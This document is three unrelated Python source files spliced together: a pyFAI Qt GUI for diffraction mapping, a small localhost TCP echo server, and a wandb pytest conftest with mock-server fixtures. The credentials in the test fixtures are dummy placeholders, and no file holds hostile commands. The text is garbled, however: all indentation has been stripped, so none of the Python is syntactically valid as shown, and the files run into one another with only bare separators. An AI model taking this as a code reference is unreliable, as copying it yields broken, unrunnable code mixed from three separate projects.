# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Module with GUI for diffraction mapping experiments"""
__author__ = "Jérôme Kieffer"
__contact__ = "Jerome.Kieffer@ESRF.eu"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "01/02/2022"
__status__ = "development"
__docformat__ = 'restructuredtext'
import os
import time
import json
import threading
import logging
import numpy
from silx.gui import qt
from silx.gui import icons
from .matplotlib import pyplot, colors
from ..utils import int_, str_, get_ui_file
from ..units import to_unit
from .widgets.WorkerConfigurator import WorkerConfigurator
from .. import worker
from ..diffmap import DiffMap
from .utils.tree import ListDataSet, DataSet
logger = logging.getLogger(__name__)
lognorm = colors.LogNorm()
class IntegrateDialog(qt.QDialog):
def __init__(self, parent=None):
qt.QDialog.__init__(self)
self.widget = WorkerConfigurator(self)
# self.widget.set1dIntegrationOnly(True)
layout = qt.QVBoxLayout(self)
layout.addWidget(self.widget)
buttons = qt.QDialogButtonBox(self)
buttons.setStandardButtons(qt.QDialogButtonBox.Cancel | qt.QDialogButtonBox.Ok)
layout.addWidget(buttons)
buttons.accepted.connect(self.accept)
buttons.rejected.connect(self.reject)
class TreeModel(qt.QAbstractItemModel):
def __init__(self, win, root_item):
super(TreeModel, self).__init__(win)
self._root_item = root_item
self._win = win
self._current_branch = None
def update(self, new_root):
self.beginResetModel()
new_labels = [i.label for i in new_root.children]
old_labels = [i.label for i in self._root_item.children]
if new_labels == old_labels:
self._root_item.update(new_root)
else:
self._root_item.children = []
for child in new_root.children:
self._root_item.add_child(child)
self.endResetModel()
def rowCount(self, parent):
if parent.column() > 0:
return 0
pitem = parent.internalPointer()
if (pitem is None) or (not parent.isValid()):
pitem = self._root_item
return len(pitem.children)
def columnCount(self, parent):
return 1
def flags(self, midx):
# if midx.column()==1:
return qt.Qt.ItemIsEnabled
def index(self, row, column, parent):
pitem = parent.internalPointer()
if not parent.isValid():
pitem = self._root_item
try:
item = pitem.children[row]
except IndexError:
return qt.QModelIndex()
return self.createIndex(row, column, item)
def data(self, midx, role):
"""
What to display depending on model_index and role
"""
leaf = midx.internalPointer()
if midx.column() == 0 and role == qt.Qt.DisplayRole:
return leaf.label
def headerData(self, section, orientation, role):
if role == qt.Qt.DisplayRole and orientation == qt.Qt.Horizontal:
# return ["Path", "shape"][section]
return ["Path"][section]
def parent(self, midx):
item = midx.internalPointer()
if (item is None) or (item is self._root_item):
return # QtCore.QModelIndex()
pitem = item.parent
if pitem is self._root_item:
return qt.QModelIndex()
row_idx = pitem.parent.children.index(pitem)
return self.createIndex(row_idx, 0, pitem)
class DiffMapWidget(qt.QWidget):
progressbarChanged = qt.Signal(int, int)
# progressbarAborted = Signal()
uif = "diffmap.ui"
json_file = ".diffmap.json"
def __init__(self):
qt.QWidget.__init__(self)
self.integration_config = {}
self.list_dataset = ListDataSet() # Contains all datasets to be treated.
try:
qt.loadUi(get_ui_file(self.uif), self)
except AttributeError as _error:
logger.error("It looks like your installation suffers from this bug: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697348")
raise RuntimeError("Please upgrade your installation of PyQt (or apply the patch)")
pyfaiIcon = icons.getQIcon("pyfai:gui/images/icon")
self.setWindowIcon(pyfaiIcon)
self.aborted = False
self.progressBar.setValue(0)
self.list_model = TreeModel(self, self.list_dataset.as_tree())
self.listFiles.setModel(self.list_model)
self.listFiles.setSelectionBehavior(qt.QAbstractItemView.SelectRows)
self.listFiles.setSelectionMode(qt.QAbstractItemView.ExtendedSelection)
self.create_connections()
self.set_validator()
self.update_number_of_frames()
self.update_number_of_points()
self.processing_thread = None
self.processing_sem = threading.Semaphore()
self.update_sem = threading.Semaphore()
# disable some widgets:
self.multiframe.setVisible(False)
self.label_10.setVisible(False)
self.frameShape.setVisible(False)
# Online visualization
self.fig = None
self.axplt = None
self.aximg = None
self.img = None
self.plot = None
self.radial_data = None
self.azimuthal_data = None
self.data_h5 = None # HDF5 dataset used while processing.
self.data_np = None # The numpy one is used only at the end.
self.last_idx = -1
self.slice = slice(0, -1, 1) # Default slicing
self._menu_file()
def set_validator(self):
validator = qt.QIntValidator(0, 999999, self)
self.fastMotorPts.setValidator(validator)
self.slowMotorPts.setValidator(validator)
self.offset.setValidator(validator)
float_valid = qt.QDoubleValidator(self)
self.rMin.setValidator(float_valid)
self.rMax.setValidator(float_valid)
def create_connections(self):
"""Signal-slot connection
"""
self.configureDiffraction.clicked.connect(self.configure_diffraction)
self.outputFileSelector.clicked.connect(self.configure_output)
self.runButton.clicked.connect(self.start_processing)
self.saveButton.clicked.connect(self.save_config)
self.abortButton.clicked.connect(self.do_abort)
self.fastMotorPts.editingFinished.connect(self.update_number_of_points)
self.slowMotorPts.editingFinished.connect(self.update_number_of_points)
self.offset.editingFinished.connect(self.update_number_of_points)
self.progressbarChanged.connect(self.update_processing)
self.rMin.editingFinished.connect(self.update_slice)
self.rMax.editingFinished.connect(self.update_slice)
# self.listFiles.expanded.connect(lambda:self.listFiles.resizeColumnToContents(0))
def _menu_file(self):
# Drop-down file menu
self.files_menu = qt.QMenu("Files")
action_more = qt.QAction("add files", self.files)
self.files_menu.addAction(action_more)
action_more.triggered.connect(self.input_filer)
action_sort = qt.QAction("sort files", self.files)
self.files_menu.addAction(action_sort)
action_sort.triggered.connect(self.sort_input)
action_clear = qt.QAction("clear selected files", self.files)
self.files_menu.addAction(action_clear)
action_clear.triggered.connect(self.clear_selection)
self.files.setMenu(self.files_menu)
def do_abort(self):
self.aborted = True
def input_filer(self, *args, **kwargs):
"""
Called when addFiles clicked: opens a file-browser and populates the
listFiles object
"""
filters = [
"HDF5 files (*.h5)",
"HDF5 files (*.hdf5)",
"NeXuS files (*.nxs)",
"EDF image files (*.edf)",
"TIFF image files (*.tif)",
"CBF files (*.cbf)",
"MarCCD image files (*.mccd)",
"Any file (*)"]
fnames = qt.QFileDialog.getOpenFileNames(self,
"Select one or more diffraction image files",
qt.QDir.currentPath(),
filter=self.tr(";;".join(filters)))
if isinstance(fnames, tuple):
# Compatibility with PyQt5
fnames = fnames[0]
for i in fnames:
self.list_dataset.append(DataSet(str_(i), None, None, None))
self.list_model.update(self.list_dataset.as_tree())
self.update_number_of_frames()
self.listFiles.resizeColumnToContents(0)
def clear_selection(self, *args, **kwargs):
"""called to remove selected files from the list
"""
logger.warning("remove all files for now !! not yet implemented")
self.list_dataset.empty()
self.list_model.update(self.list_dataset.as_tree())
def configure_diffraction(self, *arg, **kwarg):
"""
"""
logger.info("in configure_diffraction")
iw = IntegrateDialog(self)
if self.integration_config:
iw.widget.setConfig(self.integration_config)
while True:
res = iw.exec_()
if res == qt.QDialog.Accepted:
self.integration_config = iw.widget.getConfig()
if self.integration_config.get("nbpt_rad"):
break
else:
qt.QMessageBox.about(self, "Unconsistent configuration", "Some essential parameters are missing ... Did you set the radial number of points ?")
else:
break
def configure_output(self, *args, **kwargs):
"""
called when clicking on "outputFileSelector"
"""
fname = qt.QFileDialog.getSaveFileName(self, "Output file",
qt.QDir.currentPath(),
filter=self.tr("HDF5 file (*.h5);;HDF5 file (*.hdf5);;NeXuS file (*.nxs)"))
if isinstance(fname, tuple):
# Compatibility with PyQt5
fname = fname[0]
self.outputFile.setText(fname)
def start_processing(self, *arg, **kwarg):
logger.info("in start_processing")
if not self.integration_config:
result = qt.QMessageBox.warning(self,
"Azimuthal Integration",
"You need to configure first the Azimuthal integration")
if result:
self.configure_diffraction()
else:
return
if not str(self.outputFile.text()):
result = qt.QMessageBox.warning(self,
"Destination",
"You need to configure first the destination file")
if result:
self.configure_output()
else:
return
config = self.get_config()
self.progressBar.setRange(0, len(self.list_dataset))
self.aborted = False
self.display_processing(config)
self.last_idx = -1
self.processing_thread = threading.Thread(name="process", target=self.process, args=(config,))
self.processing_thread.start()
def update_number_of_frames(self):
cnt = len(self.list_dataset)
self.numberOfFrames.setText("list: %s, tree: %s" % (cnt, self.list_model._root_item.size))
def update_number_of_points(self):
try:
slow = int(self.slowMotorPts.text())
except ValueError:
slow = 1
try:
fast = int(self.fastMotorPts.text())
except ValueError:
fast = 1
try:
offset = int(self.offset.text())
except ValueError:
offset = 0
self.numberOfPoints.setText(str(slow * fast + offset))
def sort_input(self):
self.list_dataset.sort(key=lambda i: i.path)
self.list_model.update(self.list_dataset.as_tree())
def get_config(self):
"""Return a dict with the plugin configuration which is JSON-serializable
"""
res = {"ai": self.integration_config,
"experiment_title": str_(self.experimentTitle.text()).strip(),
"fast_motor_name": str_(self.fastMotorName.text()).strip(),
"slow_motor_name": str_(self.slowMotorName.text()).strip(),
"fast_motor_points": int_(self.fastMotorPts.text()),
"slow_motor_points": int_(self.slowMotorPts.text()),
"offset": int_(self.offset.text()),
"output_file": str_(self.outputFile.text()).strip(),
"input_data": [i.as_tuple() for i in self.list_dataset]
}
return res
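# Illustrative example (an assumption, not from the original source) of the kind
# of dictionary returned here and written to .diffmap.json by dump():
#   {"ai": {...},                      # azimuthal-integration worker config
#    "experiment_title": "my scan",
#    "fast_motor_name": "x", "slow_motor_name": "y",
#    "fast_motor_points": 10, "slow_motor_points": 10,
#    "offset": 0,
#    "output_file": "diffmap.h5",
#    "input_data": [("/path/img_0000.edf", None, None, None), ...]}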
def set_config(self, dico):
"""Set up the widget from dictionary
:param dico: dictionary
"""
self.integration_config = dico.get("ai", {})
# TODO
setup_data = {"experiment_title": self.experimentTitle.setText,
"fast_motor_name": self.fastMotorName.setText,
"slow_motor_name": self.slowMotorName.setText,
"fast_motor_points": lambda a: self.fastMotorPts.setText(str_(a)),
"slow_motor_points": lambda a: self.slowMotorPts.setText(str_(a)),
"offset": lambda a: self.offset.setText(str_(a)),
"output_file": self.outputFile.setText
}
for key, value in setup_data.items():
if key in dico:
value(dico[key])
self.list_dataset = ListDataSet(DataSet(*(str_(j) for j in i)) for i in dico.get("input_data", []))
self.list_model.update(self.list_dataset.as_tree())
self.update_number_of_frames()
self.update_number_of_points()
self.listFiles.resizeColumnToContents(0)
def dump(self, fname=None):
"""Save the configuration in a JSON file
:param fname: file where the config is saved as JSON
"""
if fname is None:
fname = self.json_file
config = self.get_config()
with open(fname, "w") as fd:
fd.write(json.dumps(config, indent=2))
return config
def restore(self, fname=None):
"""Restore the widget from saved config
:param fname: file where the config is saved as JSON
"""
if fname is None:
fname = self.json_file
if not os.path.exists(fname):
logger.warning("No such configuration file: %s", fname)
return
with open(fname, "r") as fd:
dico = json.loads(fd.read())
self.set_config(dico)
def save_config(self):
logger.debug("save_config")
json_file = qt.QFileDialog.getSaveFileName(caption="Save configuration as json",
directory=self.json_file,
filter="Config (*.json)")
if isinstance(json_file, tuple):
# Compatibility with PyQt5
json_file = json_file[0]
if json_file:
self.dump(json_file)
def process(self, config=None):
"""
Called in a separate thread
"""
logger.info("process")
t0 = time.perf_counter()
with self.processing_sem:
config = self.dump()
config_ai = config.get("ai", {})
config_ai = config_ai.copy()
if "nbpt_rad" not in config_ai:
raise RuntimeError("The number of radial points is mandatory !")
diffmap = DiffMap(npt_fast=config.get("fast_motor_points", 1),
npt_slow=config.get("slow_motor_points", 1),
npt_rad=config_ai.get("nbpt_rad", 1000),
npt_azim=config_ai.get("nbpt_azim", 1) if config_ai.get("do_2D") else None)
diffmap.inputfiles = [i.path for i in self.list_dataset] # in case generic detector without shape
diffmap.worker = worker.Worker()
diffmap.worker.set_config(config_ai, consume_keys=False)
diffmap.hdf5 = config.get("output_file", "unamed.h5")
self.radial_data, self.azimuthal_data = diffmap.init_ai()
self.data_h5 = diffmap.dataset
for i, fn in enumerate(self.list_dataset):
diffmap.process_one_file(fn.path)
self.progressbarChanged.emit(i, diffmap._idx)
if self.aborted:
logger.warning("Aborted by user")
self.progressbarChanged.emit(0, 0)
if diffmap.nxs:
self.data_np = diffmap.dataset[()]
diffmap.nxs.close()
return
if diffmap.nxs:
self.data_np = diffmap.dataset[()]
diffmap.nxs.close()
logger.warning("Processing finished in %.3fs", time.perf_counter() - t0)
self.progressbarChanged.emit(len(self.list_dataset), 0)
def display_processing(self, config):
"""Setup the display for visualizing the processing
:param config: configuration of the processing ongoing
"""
self.fig = pyplot.figure(figsize=(12, 5))
self.aximg = self.fig.add_subplot(1, 2, 1,
xlabel=config.get("fast_motor_name", "Fast motor"),
ylabel=config.get("slow_motor_name", "Slow motor"),
xlim=(-0.5, config.get("fast_motor_points", 1) - 0.5),
ylim=(-0.5, config.get("slow_motor_points", 1) - 0.5))
self.aximg.set_title(config.get("experiment_title", "Diffraction imaging"))
# print(config)
self.axplt = self.fig.add_subplot(1, 2, 2,
xlabel=to_unit(config.get("ai").get("unit")).label,
# ylabel="Scattered intensity"
)
self.axplt.set_title("Average diffraction pattern")
self.fig.show()
def update_processing(self, idx_file, idx_img):
""" Update the process bar and the images
:param idx_file: file number
:param idx_img: frame number
"""
cmap = "inferno"
if idx_file >= 0:
self.progressBar.setValue(idx_file)
# Check if there is a free semaphore without blocking
if self.update_sem.acquire(blocking=False):
self.update_sem.release()
else:
# It's full
return
with self.update_sem:
try:
data = self.data_h5[()]
except ValueError:
data = self.data_np
if self.radial_data is None:
return
npt = self.radial_data.size
intensity = numpy.nanmean(data, axis=(0,1))
if self.last_idx < 0:
self.update_slice()
if data.ndim == 4:
img = data[..., self.slice].mean(axis=(2,3))
self.plot = self.axplt.imshow(intensity,
interpolation="nearest",
norm=lognorm,
cmap=cmap,
origin="lower",
extent=[self.radial_data.min(), self.radial_data.max(),
self.azimuthal_data.min(), self.azimuthal_data.max()],
aspect="auto",)
self.axplt.set_ylabel("Azimuthal angle (°)")
else:
img = data[..., self.slice].mean(axis=-1)
self.axplt.set_ylabel("Scattered intensity")
self.plot = self.axplt.plot(self.radial_data, intensity)[0]
self.img = self.aximg.imshow(img,
interpolation="nearest",
cmap=cmap,
origin="lower",
)
else:
if data.ndim == 4:
img = numpy.nanmean(data[..., self.slice], axis=(2,3))
img[img<lognorm.vmin] = numpy.NaN
self.plot.set_data(intensity)
else:
img = data[:, :, self.slice].mean(axis=2)
self.plot.set_ydata(intensity)
self.img.set_data(img)
self.last_idx = idx_img
self.fig.canvas.draw()
qt.QCoreApplication.processEvents()
time.sleep(0.1)
def update_slice(self, *args):
"""
Update the slice
"""
if self.radial_data is None:
return
try:
qmin = float(self.rMin.text())
except ValueError:
qmin = 0
try:
qmax = float(self.rMax.text())
except ValueError:
qmax = 1e300
start = (self.radial_data < qmin).sum()
stop = (self.radial_data <= qmax).sum()
self.slice = slice(start, stop)
self.update_processing(-1, self.last_idx)
|
socket_server.py
|
import socket
import threading
import time
# Server side
def deal_client(sock,addr):
print('Accept new connection from {}'.format(addr))
# send() takes binary data (bytes)
sock.send(b'Hello, I am a server.')
while True:
# recv() returns bytes
data=sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8')=='exit':
break
print('--->>{}'.format(data.decode('utf-8')))
sock.send(('Loop_Msg:{}'.format(data.decode('utf-8'))).encode('utf-8'))
sock.close()
print('Connection from {} closed.'.format(addr))
if __name__ == "__main__":
# Create a socket using IPv4 and TCP
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the (local) IP and port; bind takes a tuple as its argument
s.bind(('127.0.0.1',4013))
s.listen(5)
print('Waiting for connection...')
while True:
sock,addr=s.accept()
# Create a new thread to handle the TCP connection
t=threading.Thread(target=deal_client,args=(sock,addr))
t.start()
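# A minimal matching client sketch (illustrative, run from a separate process;
# not part of the original file):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 4013))
#   print(c.recv(1024).decode('utf-8'))   # "Hello, I am a server."
#   c.send(b'hi')
#   print(c.recv(1024).decode('utf-8'))   # "Loop_Msg:hi"
#   c.send(b'exit')
#   c.close()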
|
conftest.py
|
from __future__ import print_function
import pytest
import time
import datetime
import requests
import os
import sys
import threading
import logging
import shutil
from contextlib import contextmanager
from tests import utils
from six.moves import queue
from wandb import wandb_sdk
# from multiprocessing import Process
import subprocess
import click
from click.testing import CliRunner
import webbrowser
import git
import psutil
import atexit
import wandb
from wandb.util import mkdir_exists_ok
from six.moves import urllib
# TODO: consolidate dynamic imports
PY3 = sys.version_info.major == 3 and sys.version_info.minor >= 6
if PY3:
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.interface.interface import BackendSender
else:
from wandb.sdk_py27.lib.module import unset_globals
from wandb.sdk_py27.lib.git import GitRepo
from wandb.sdk_py27.internal.handler import HandleManager
from wandb.sdk_py27.internal.sender import SendManager
from wandb.sdk_py27.interface.interface import BackendSender
from wandb.proto import wandb_internal_pb2
from wandb.proto import wandb_internal_pb2 as pb
try:
import nbformat
except ImportError: # TODO: no fancy notebook fun in python2
pass
try:
from unittest.mock import MagicMock
except ImportError: # TODO: this is only for python2
from mock import MagicMock
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = "http://localhost:%i" % server._port
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print("Attempting to connect but got: %s" % res)
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def git_repo(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
""" Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_time=time.time(),
base_url=live_mock_server.base_url,
root_dir=test_dir,
save_code=False,
project="test",
console="off",
host="test",
api_key=DUMMY_API_KEY,
run_id=wandb.util.generate_id(),
_start_datetime=datetime.datetime.now(),
)
settings.setdefaults()
yield settings
# Just in case someone forgets to join in tests
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
""" A managed run object for tests with a mock backend """
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(wandb.util, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(wandb.wandb_lib.apikey, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebook talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
@pytest.fixture
def mocked_ipython(monkeypatch):
monkeypatch.setattr(
wandb.wandb_sdk.wandb_settings, "_get_python_type", lambda: "jupyter"
)
ipython = MagicMock()
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
wandb.jupyter.get_ipython = lambda: ipython
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=wandb.Settings(console="off", mode="offline", _except_exit=False),
**args["wandb_init"]
)
yield run
wandb.join()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
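# An illustrative sketch (it would live in a test module, not this conftest) of
# parameterizing wandb_init_run via the wandb_args marker documented in
# default_wandb_args(); the test name, env var, and init kwargs are placeholders.
#
# @pytest.mark.wandb_args(env={"WANDB_SILENT": "true"}, wandb_init={"tags": ["smoke"]})
# def test_init_with_marker(wandb_init_run):
#     assert wandb_init_run is not None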
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=wandb.Settings(
console="off", mode="offline", _except_exit=False
),
*args,
**kwargs
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def disable_console():
os.environ["WANDB_CONSOLE"] = "off"
yield
del os.environ["WANDB_CONSOLE"]
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx):
return utils.ParseCTX(ctx)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return BackendSender(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
